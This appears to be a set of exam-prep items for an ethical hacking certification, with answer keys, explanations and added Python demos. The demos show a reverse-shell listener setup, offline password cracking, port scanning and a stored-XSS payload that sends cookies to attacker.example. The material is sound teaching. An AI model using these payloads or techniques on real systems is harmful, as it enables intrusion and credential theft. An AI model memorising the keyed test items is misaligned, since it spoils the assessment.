CertiProf CEHPC - Ethical Hacking Professional Certification Exam
What is the Lhost in metasploit?
Local host.
Host line.
Local hosting.
The Answer Is:
A
Explanation:
In the Metasploit Framework, LHOST stands for Local Host. It is the configuration variable that holds the IP address of the attacker's (tester's) machine. When an ethical hacker deploys an exploit that carries a reverse-shell payload, LHOST tells the payload running on the victim's machine exactly where to send the connection back to.
Setting LHOST correctly is vital to the success of an exploitation attempt. In environments that involve NAT (Network Address Translation) or VPNs, the tester must use the address that is reachable from the target, not simply the address of a local interface. On a local network that is the tester's internal IP; over a wider network or the internet it must be a public IP with the port forwarded to the listener, or a relay host the tester controls. A quick sanity check is to look at which interface the operating system would use to reach the target (for example, ip route get RHOST on Linux) and to confirm that the target can route back to that address.
Along with LPORT (Local Port), LHOST defines the listener on the attacker's machine. When the exploit executes on the target (RHOST), the payload initiates a connection back to LHOST:LPORT. If either variable is misconfigured, the exploit may run successfully on the victim's end, but the tester never receives the shell and the attempt fails. Egress filtering on the target network produces the same symptom: if the victim cannot reach LPORT outbound, the callback is silently dropped, which is why testers often choose a port such as 443 that is commonly allowed out. Double-checking LHOST and LPORT, and confirming that the matching handler is already listening, is a standard best practice before launching any module.
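The following Python helper is an added example for this answer, not code from the exam or from the Metasploit project. It picks the local address the OS would use to reach RHOST (a UDP connect() sends no packets), warns when that address is one the target cannot route back to, and writes the matching multi/handler resource script. The target address, payload name and port are constructed for an offline run.

```python
import ipaddress
import socket


def pick_lhost(rhost: str) -> str:
    """Return the local address the OS would use to reach rhost.

    connect() on a UDP socket transmits nothing; it only makes the kernel
    choose the outbound interface for that destination, which is the
    address a target on that path would see as the source.
    """
    family = socket.AF_INET6 if ":" in rhost else socket.AF_INET
    with socket.socket(family, socket.SOCK_DGRAM) as s:
        s.connect((rhost, 9))  # port is irrelevant; no packet is sent
        return s.getsockname()[0]


def reachability_warnings(lhost: str, rhost: str) -> list:
    """Flag LHOST values the target cannot route a reverse connection to."""
    local = ipaddress.ip_address(lhost)
    remote = ipaddress.ip_address(rhost)
    warnings = []
    if local.is_loopback and not remote.is_loopback:
        warnings.append("LHOST is loopback: only a target on this host can connect back")
    elif not local.is_global and remote.is_global:
        warnings.append("LHOST is not globally routable but RHOST is: you are behind NAT, "
                        "set LHOST to your public IP (with port forwarding) or a relay host")
    return warnings


def handler_rc(lhost: str, lport: int,
               payload: str = "windows/x64/meterpreter/reverse_tcp") -> str:
    """Build an msfconsole resource script for the listener that matches the payload.

    Run it with: msfconsole -r handler.rc
    """
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        "exploit -j",
    ])


if __name__ == "__main__":
    rhost = "127.0.0.1"  # constructed target so the example runs offline
    lhost = pick_lhost(rhost)
    for w in reachability_warnings(lhost, rhost):
        print("WARNING:", w)
    print(handler_rc(lhost, 4444))
```

The warning logic is deliberately conservative: an RFC 1918 LHOST against a public RHOST is almost always a NAT mistake, while the same LHOST against a private RHOST is the normal internal-network case.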
Can all computers be hacked?
Yes, all computer equipment can be hacked without any complications.
Yes, all are hackable.
No, only those that are not updated with security patches, for both the operating system and programs, and that have exposed ports.
The Answer Is:
C
Explanation:
A common misconception in cybersecurity is that every single computer system is inherently vulnerable to a breach at any given moment. However, from an ethical hacking and defensive standpoint, a computer is only "hackable" if it presents an exploitable vulnerability. A system that is fully patched, correctly configured, and isolated from unnecessary network exposure is significantly harder to compromise, often to the point where an attack is no longer viable for a standard threat actor.
Vulnerabilities typically arise from three main areas: unpatched software, misconfigurations, and human error. Security patches are updates issued by vendors to fix known vulnerabilities in the operating system or applications. If an administrator applies these patches promptly, they close the "windows of opportunity" that hackers use to gain entry. Furthermore, "exposed ports" refer to network entry points that are left open and listening for connections. A secure system follows the principle of "Least Functionality," meaning only essential ports and services are active, thereby reducing the "attack surface."
The statement that all computers are hackable "without any complications" is incorrect because security is a layered discipline. A persistent and well-funded actor, such as a state-sponsored group, might eventually find a "zero-day" vulnerability (a flaw unknown to the vendor), but the vast majority of systems remain secure as long as they adhere to rigorous maintenance schedules. Defensive strategies focus on "hardening": removing unnecessary software, disabling unused services, and implementing strong authentication. A computer that is meticulously updated and shielded by firewalls and intrusion prevention systems offers no "foothold" through known, standard vectors, which is what option C describes. In practice no system is unbreakable, so patching is combined with monitoring, least privilege and defence in depth rather than treated as a guarantee. The point is proactive management of attack vectors rather than assuming inevitable defeat.
The malicious code is permanently stored on the server.
The source code of the page, this can be html or javascript.
In this type of attack, the malicious code is sent to the web server via an HTTP request. The server then processes the request and returns a response that includes the malicious code.
The Answer Is:
A
Explanation:
Persistent Cross-Site Scripting (XSS), also known as Stored XSS, is one of the most dangerous forms of web application vulnerabilities. It occurs when a web application receives data from a user and stores it permanently in its backend database or filesystem without proper sanitization or encoding. Common vectors for persistent XSS include comment sections, user profiles, message boards, and "Contact Us" forms. Unlike Reflected XSS, where the payload is included in a specific URL and only affects the user who clicks that link, a persistent XSS payload is served automatically to every user who visits the affected page.
When an attacker successfully injects a malicious script (typically JavaScript), the server "remembers" it. Every time a legitimate user requests the page where the data is displayed, the server includes the malicious code in the HTML response, and the user's browser, trusting the origin, executes it. The consequences can be severe: session hijacking through theft of session cookies, account takeover, or redirection of users to malicious websites. From an ethical hacking perspective, identifying persistent XSS means testing every input field whose data is displayed later, including fields shown only to administrators. Mitigation follows the principle of "filter input, escape output." Input should be validated against a strict whitelist of allowed characters, and any data rendered in the browser must be encoded for the context it lands in (for example, converting < to &lt; in HTML text, and additionally " to &quot; inside attribute values) so the browser never interprets the data as executable code; a Content Security Policy and HttpOnly session cookies limit the damage if encoding is missed. Because the payload is stored on the server, this vulnerability puts an organization's entire user base at risk, making it a high-priority finding in any security assessment.
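As an added illustration of the above (not code from the exam or any real application), the following Python snippet simulates a comment feature: a constructed attacker submission is "stored", then rendered once by a vulnerable concatenating template and once with context-aware encoding. A small HTMLParser-based audit counts what a browser would actually execute in each rendering.

```python
import html
from html.parser import HTMLParser

# Constructed attacker submissions to a comment form (not real traffic).
STORED_NAME = 'x" onmouseover="alert(1)'
STORED_COMMENT = ('Nice post! <script>fetch("https://attacker.example/?c="'
                  '+document.cookie)</script>')

# Simulated persistence layer: once stored, the payload is served to every visitor.
DATABASE = [(STORED_NAME, STORED_COMMENT)]


def render_unsafe(name: str, comment: str) -> str:
    """Vulnerable: stored data is concatenated straight into the HTML response."""
    return f'<div class="comment" data-author="{name}"><p>{comment}</p></div>'


def render_safe(name: str, comment: str) -> str:
    """Context-aware output encoding: the attribute context also needs quotes escaped."""
    return (f'<div class="comment" data-author="{html.escape(name, quote=True)}">'
            f'<p>{html.escape(comment, quote=False)}</p></div>')  # text node: < > & suffice


class _ActiveContentAudit(HTMLParser):
    """Records what a browser would treat as executable: script tags and on* handlers."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script")
        for attr_name, _ in attrs:
            if attr_name.startswith("on"):
                self.hits.append(attr_name)


def active_content(rendered_html: str) -> list:
    """Return the executable constructs a browser would see in rendered_html."""
    parser = _ActiveContentAudit()
    parser.feed(rendered_html)
    parser.close()
    return parser.hits


def page(render) -> str:
    """Render every stored comment with the given renderer, as a page view would."""
    return "\n".join(render(name, comment) for name, comment in DATABASE)


if __name__ == "__main__":
    print("unsafe:", active_content(page(render_unsafe)))
    print("safe:  ", active_content(page(render_safe)))
```

The name field shows why the encoding must be context-aware: escaping only < and > would still let the stored quote character close the data-author attribute and start an onmouseover handler.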
What is a dictionary used for brute-force attacks?
A common dictionary that contains words and their meanings.
A plain text document where passwords are usually stored.
A document containing a list of possible passwords that may successfully authenticate into a system.
The Answer Is:
C
Explanation:
In ethical hacking and penetration testing, a dictionary used for brute-force or dictionary attacks is a file containing a list of potential passwords that an attacker or tester attempts against a target authentication mechanism. Therefore, option C is the correct answer.
Dictionary files are typically plain text documents that include commonly used passwords, leaked credentials, default passwords, variations of words, and patterns frequently chosen by users. Ethical hackers use these dictionaries during password auditing and authentication testing to assess the strength of password policies implemented by an organization.
Option A is incorrect because a traditional language dictionary explains word meanings and is not structured for authentication testing. Option B is also incorrect because passwords are not normally stored in readable plain text documents; secure systems store a salted, deliberately slow hash of each password (bcrypt, scrypt, Argon2 or PBKDF2) rather than the password itself.
From a security perspective, dictionary attacks exploit human behavior, particularly the tendency to choose weak or predictable passwords. Ethical hackers simulate these attacks in controlled environments to demonstrate the risks of poor password hygiene. The results help organizations enforce stronger password policies, multi-factor authentication, and account lockout mechanisms.
Understanding dictionary-based brute-force attacks is essential for managing attack vectors, as credential compromise remains one of the most common entry points for attackers. Ethical use of dictionaries allows organizations to proactively identify weaknesses before malicious actors exploit them.
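To make the mechanics concrete, here is an added Python example (not from the exam) of an offline dictionary attack against a salted PBKDF2 hash. The wordlist, mangling rules, iteration count and sample passwords are all constructed for the demonstration; real wordlists such as rockyou.txt have millions of entries and real rule sets are far larger.

```python
import hashlib
import os

# Constructed mini wordlist; a real one (rockyou.txt, SecLists) has millions of entries.
WORDLIST = ["password", "welcome", "summer", "letmein", "admin"]
SUFFIXES = ("1", "123", "!", "2024", "!1")


def mangle(word: str):
    """Yield the base word plus the case and suffix variations users actually pick.

    This is the idea behind hashcat/John rule files, reduced to two rules.
    """
    for base in dict.fromkeys([word, word.capitalize(), word.upper()]):
        yield base
        for suffix in SUFFIXES:
            yield base + suffix


def hash_password(password: str, salt: bytes, iterations: int) -> bytes:
    """Salted PBKDF2-HMAC-SHA256, the way a sane application stores credentials."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def dictionary_attack(target: bytes, salt: bytes, wordlist, iterations: int):
    """Offline attack: hash each candidate with the victim's salt and compare.

    Returns (recovered_password_or_None, candidates_tried).
    """
    tried = 0
    for word in wordlist:
        for candidate in mangle(word):
            tried += 1
            if hash_password(candidate, salt, iterations) == target:
                return candidate, tried
    return None, tried


def demo(password: str, iterations: int = 10_000):
    """Store `password` the way the victim application would, then attack the hash.

    10_000 iterations keeps the demo fast; production settings are higher.
    """
    salt = os.urandom(16)
    stored = hash_password(password, salt, iterations)
    return dictionary_attack(stored, salt, WORDLIST, iterations)


if __name__ == "__main__":
    print(demo("Welcome123"))   # a "policy-compliant" password that a rule recovers
    print(demo("x9#Qm!r2Lp"))   # a random password: every candidate fails
```

Two things the run makes visible: the salt does not stop the attack (the attacker has it), it only prevents precomputed tables, and the cost per guess is set by the iteration count, which is why slow hashes plus lockout or rate limiting on the online side are the real defence.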
What is malware?
Refers to any software specifically designed to protect, safeguard and store data on a device, network or system.
Refers to any software specifically designed to damage, infect, steal data or otherwise cause a nuisance to a device, network or computer system, without the owner's consent.
It is an Antivirus for servers especially.
The Answer Is:
B
Explanation:
Malware, short for "malicious software," is a broad category of intrusive software developed by cybercriminals to compromise the confidentiality, integrity, or availability of a victim's data. It encompasses a wide variety of threats, including viruses, worms, Trojans, ransomware, and spyware. The defining characteristic of malware is that it is installed and executed on a system without the explicit consent or knowledge of the owner, with the primary intent of causing harm, stealing sensitive information, or gaining unauthorized access.
Managing malware as a security threat involves understanding its infection vectors and payload behaviors. Viruses attach themselves to legitimate files and spread through user interaction, while worms are self-replicating and spread across networks automatically by exploiting vulnerabilities. Trojans disguise themselves as useful programs to trick users into executing them, often opening "backdoors" for further exploitation. Ransomware, one of the most profitable forms of malware today, encrypts a user's files and demands payment for the decryption key.
Ethical hackers study malware to develop better detection signatures and behavioral analysis techniques. By analyzing how malware obfuscates its code or communicates with a Command and Control (C2) server, security professionals can implement better endpoint protection and network monitoring. Protecting against malware requires a multi-layered defense strategy, including up-to-date antivirus software, regular system patching, and user awareness training to prevent the execution of suspicious attachments or links. Understanding the diverse nature of malware is essential for any cybersecurity expert, as it remains the primary tool used by attackers to gain a foothold within targeted organizations.
What is a public IP?
Public IP addresses are assigned by Internet service providers.
It is the IP address assigned by the modem to the devices.
It is an IP that everyone uses.
The Answer Is:
A
Explanation:
A public IP address is a fundamental element of the global internet infrastructure, serving as a unique identifier for a device or network gateway on the public web. These addresses are assigned by Internet Service Providers (ISPs) to their customers. Unlike private IP addresses, which are used for internal communication within a local network (like your home or office Wi-Fi), a public IP is globally unique and routable across the entire internet.
In the context of information security, the public IP represents the "front door" of an organization’s digital presence. It is the address that external servers, websites, and hackers see when a connection is made. For example, when an ethical hacker performs an "External Penetration Test," they are targeting the organization’s public IP to see what services (like web servers or VPN gateways) are exposed to the world.
Understanding the difference between a public IP and a private IP is crucial for managing security perimeters. While a modem or router assigns private IPs to internal devices (option B), the router itself holds the public IP assigned by the ISP to communicate with the rest of the world. Protecting the public IP involves using firewalls and intrusion prevention systems to ensure that only legitimate traffic is allowed into the internal network. Because this address is visible to everyone, it is often the first point of contact for reconnaissance activities such as port scanning or lookups in internet-wide scan databases like Shodan, making it a vital element to monitor and secure.
What is the results report document?
A document that lists tasks left unfinished due to time constraints.
A document that details findings, including identified vulnerabilities and exposed sensitive information.
A document used only to sign the agreement with the client.
The Answer Is:
B
Explanation:
The results report document is a critical deliverable in the penetration testing process, making option B the correct answer. This document summarizes the findings of the engagement, including discovered vulnerabilities, exposed sensitive information, attack paths, and the potential impact on the organization.
A professional penetration testing report typically includes an executive summary, methodology, scope, risk ratings, technical details, evidence, and remediation recommendations. The goal is not just to list vulnerabilities but to help stakeholders understand risk severity and business impact.
Option A is incorrect because incomplete work is usually addressed separately in project management documentation. Option C is incorrect because agreements and authorization documents are handled before testing begins, not in the results report.
From an ethical hacking standpoint, the results report supports transparency, accountability, and improvement. Ethical hackers must ensure findings are accurate, reproducible, and clearly explained. Poor reporting can reduce the value of an otherwise successful test.
The report also serves as a roadmap for remediation, allowing organizations to prioritize fixes, improve controls, and reduce future attack surfaces. High-quality reporting is a defining characteristic of professional ethical hacking.
What tool would you use to scan ports?
Metasploit
Nmap
Shodan
The Answer Is:
B
Explanation:
Nmap is the primary tool used for port scanning, making option B the correct answer. Port scanning is a core activity during the reconnaissance and scanning phases of penetration testing, where the goal is to identify open, closed, or filtered ports on target systems.
Nmap allows ethical hackers to discover which services are running, their versions, and potential misconfigurations. It supports multiple scan types, including TCP SYN scans, UDP scans, and service detection scans, making it highly versatile and efficient.
Option A is incorrect because Metasploit is primarily an exploitation framework; it ships auxiliary scanner modules (for example auxiliary/scanner/portscan/tcp), but it is not a dedicated port scanner. Option C is incorrect because Shodan is an internet-wide search engine over previously collected scan data, not a tool that scans a specific target on demand.
Understanding port scanning is essential for identifying attack surfaces. Open ports often expose services that may contain vulnerabilities or misconfigurations. Ethical hackers use Nmap responsibly to map networks and guide further testing.
From a defensive perspective, regular port scanning helps organizations identify unnecessary services and enforce least-exposure principles. Nmap remains one of the most fundamental tools in ethical hacking and network security.
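The following Python scanner is an added example for this answer (not code from the exam or from Nmap itself). It reproduces the three states a TCP connect scan (nmap -sT) reports and grabs a service banner the way basic version detection (nmap -sV) starts. To run offline it starts a constructed listener on 127.0.0.1 and picks a second port that nothing listens on; the greeting it serves is made up.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host: str, port: int, timeout: float = 1.0) -> str:
    """TCP connect() probe, classified the way nmap -sT reports a port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"             # handshake completed: something is listening
        except ConnectionRefusedError:
            return "closed"           # RST came back: reachable, nothing listening
        except (socket.timeout, OSError):
            return "filtered"         # no answer or unreachable: a filter dropped it


def scan(host: str, ports, timeout: float = 1.0, workers: int = 64) -> dict:
    """Probe many ports concurrently; returns {port: state}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return dict(zip(ports, states))


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """Read the service's greeting, the simplest form of nmap -sV version detection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(256).decode(errors="replace").strip()
        except socket.timeout:
            return ""


def start_demo_service(greeting: bytes = b"SSH-2.0-ConstructedDemo\r\n") -> int:
    """Constructed listener on 127.0.0.1 so the scan has an open port offline; returns it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                try:
                    conn.sendall(greeting)
                except OSError:
                    pass  # the scanner already hung up; that is fine

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def unused_port() -> int:
    """Pick a port nothing listens on, so the scan also shows a 'closed' result."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    open_port, closed_port = start_demo_service(), unused_port()
    for port, state in sorted(scan("127.0.0.1", [open_port, closed_port]).items()):
        extra = f"  {grab_banner('127.0.0.1', port)}" if state == "open" else ""
        print(f"{port}/tcp  {state}{extra}")
```

Note the difference between "closed" and "filtered": a closed port still proves the host is up and answering, while a filtered port reveals a firewall dropping packets, which is exactly the distinction a tester uses to map a perimeter. A full connect() scan is also far noisier in logs than Nmap's default half-open SYN scan.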
What is a Firewall?
It is a firewall that serves to protect the server.
It is a computer security measure designed to protect a network, computer system or device against external or internal threats by monitoring, controlling and filtering network traffic according to a set of predefined rules.
It is a protection system designed so that hackers cannot be discovered.
The Answer Is:
B
Explanation:
A firewall is a fundamental network security component that acts as a barrier between a trusted internal network and an untrusted external network, such as the internet. Its primary function is to monitor, control, and filter incoming and outgoing network traffic based on a set of predefined security rules. By inspecting each packet of data, the firewall determines whether to allow it to pass through or to block it entirely, thereby preventing unauthorized access and malicious activity.
Firewalls can be implemented as either hardware or software, and they generally operate at different levels of the network stack:
Packet Filtering: The most basic form, which inspects packets based on source/destination IP addresses and ports.
Stateful Inspection: A more advanced method that tracks the state of active connections to ensure that incoming traffic is a legitimate response to an internal request.
Application Level (Proxy Firewalls): These inspect the actual content of the data (the payload) for specific applications, such as web traffic (HTTP) or email (SMTP), to identify sophisticated threats that simple packet filters might miss.
In the context of ethical hacking, firewalls are the "first line of defense". During a penetration test, a tester must identify the type of firewall in place and attempt to find "holes" or misconfigurations in its rule set. A common goal is to find an inbound port the firewall accidentally left open, which exposes a service that can then be attacked directly, and to check whether outbound (egress) traffic is filtered at all, since a reverse shell from a compromised host succeeds only if that host is allowed to connect back out to the tester's listener. A properly configured firewall, with tight inbound rules and deliberate egress rules, is essential for minimizing an organization's attack surface and protecting its servers and users from being compromised.
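As an added example (not from the exam or any firewall product), the Python model below contrasts a packet-filtering rule set with a stateful one. The traffic is constructed: an internal client opening an HTTPS connection, the server's reply, and an attacker who sets source port 443 (what nmap --source-port 443 does) to look like a reply. The stateless filter can only admit real replies by admitting anything from port 443; the stateful filter admits the reply because it remembers the outbound flow and still rejects the attacker's new connection.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str = "S"      # "S" = new connection, "SA"/"A" = part of an existing one
    proto: str = "tcp"


@dataclass(frozen=True)
class Rule:
    action: str                   # "allow" or "deny"
    direction: str                # "in" (from the untrusted side) or "out"
    dport: Optional[int] = None   # None matches any port
    sport: Optional[int] = None
    proto: str = "tcp"

    def matches(self, pkt: Packet, direction: str) -> bool:
        return (self.direction == direction and self.proto == pkt.proto
                and (self.dport is None or self.dport == pkt.dport)
                and (self.sport is None or self.sport == pkt.sport))


class StatelessFirewall:
    """Packet filtering: each packet is judged on its own header, first match wins."""

    def __init__(self, rules, default: str = "deny"):
        self.rules, self.default = list(rules), default

    def decide(self, pkt: Packet, direction: str) -> str:
        for rule in self.rules:
            if rule.matches(pkt, direction):
                return rule.action
        return self.default


class StatefulFirewall(StatelessFirewall):
    """Stateful inspection: remembers allowed flows so replies need no inbound rule."""

    def __init__(self, rules, default: str = "deny"):
        super().__init__(rules, default)
        self.flows = set()

    def decide(self, pkt: Packet, direction: str) -> str:
        flow = (pkt.proto, pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse = (pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport)
        # A bare SYN always starts a new connection and is never treated as a reply.
        if pkt.flags != "S" and (flow in self.flows or reverse in self.flows):
            return "allow"
        verdict = super().decide(pkt, direction)
        if verdict == "allow":
            self.flows.add(flow)
        return verdict


# Constructed traffic for the comparison.
CLIENT_SYN = Packet("10.0.0.5", 51000, "198.51.100.10", 443, "S")     # client browses out
SERVER_REPLY = Packet("198.51.100.10", 443, "10.0.0.5", 51000, "SA")  # server answers
ATTACKER_SSH = Packet("198.51.100.99", 443, "10.0.0.5", 22, "S")      # spoofed "reply" to port 22


def stateless_results() -> tuple:
    # To let replies in at all, a stateless filter must allow any inbound packet from port 443.
    fw = StatelessFirewall([Rule("allow", "out", dport=443), Rule("allow", "in", sport=443)])
    return (fw.decide(CLIENT_SYN, "out"), fw.decide(SERVER_REPLY, "in"),
            fw.decide(ATTACKER_SSH, "in"))


def stateful_results() -> tuple:
    fw = StatefulFirewall([Rule("allow", "out", dport=443)])
    return (fw.decide(CLIENT_SYN, "out"), fw.decide(SERVER_REPLY, "in"),
            fw.decide(ATTACKER_SSH, "in"))


if __name__ == "__main__":
    print("stateless (client, reply, attacker):", stateless_results())
    print("stateful  (client, reply, attacker):", stateful_results())
```

Real stateful firewalls track more than a 5-tuple (sequence numbers, timeouts, UDP pseudo-state), but the essential difference is the same: the filter's memory of who initiated the connection is what lets it keep inbound rules at "deny everything unsolicited".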
Besides Kali Linux, what other operating system is used for hacking?
Hannah Montana Linux.
Windows XP
Parrot OS.
The Answer Is:
C
Explanation:
While Kali Linux is the most widely recognized platform for penetration testing, Parrot OS is the other major distribution in common use in the cybersecurity community. Parrot OS is a Debian-based distribution that, like Kali, comes pre-loaded with a large set of tools for security auditing, digital forensics, and reverse engineering. It is frequently cited as a lighter, more user-friendly alternative that places additional emphasis on privacy and anonymity, with built-in tooling for routing traffic through the Tor network.
In the landscape of modern security trends, the choice of an operating system often depends on the specific requirements of the pentest. Parrot OS is designed to be highly portable and efficient on hardware with limited resources, making it a popular choice for "Security on the Go." It provides a "Home" edition for daily use and a "Security" edition tailored specifically for professional hackers. Other notable mentions in this category include BlackArch and BackBox, but Parrot OS remains one of the top contenders alongside Kali Linux for industry professionals.
Understanding these different platforms is crucial for an ethical hacker, as each offers different desktop environments and tool configurations. For example, while Kali is built for offensive operations, Parrot often places more emphasis on the developer's needs, including pre-installed compilers and IDEs alongside hacking tools. Using these specialized Linux distributions allows testers to work in a stable, standardized environment where tools are pre-configured to handle the complexities of network exploitation. By staying current with these trends, security professionals can ensure they are using the most efficient and up-to-date environments available to identify and mitigate vulnerabilities in increasingly complex digital infrastructures.
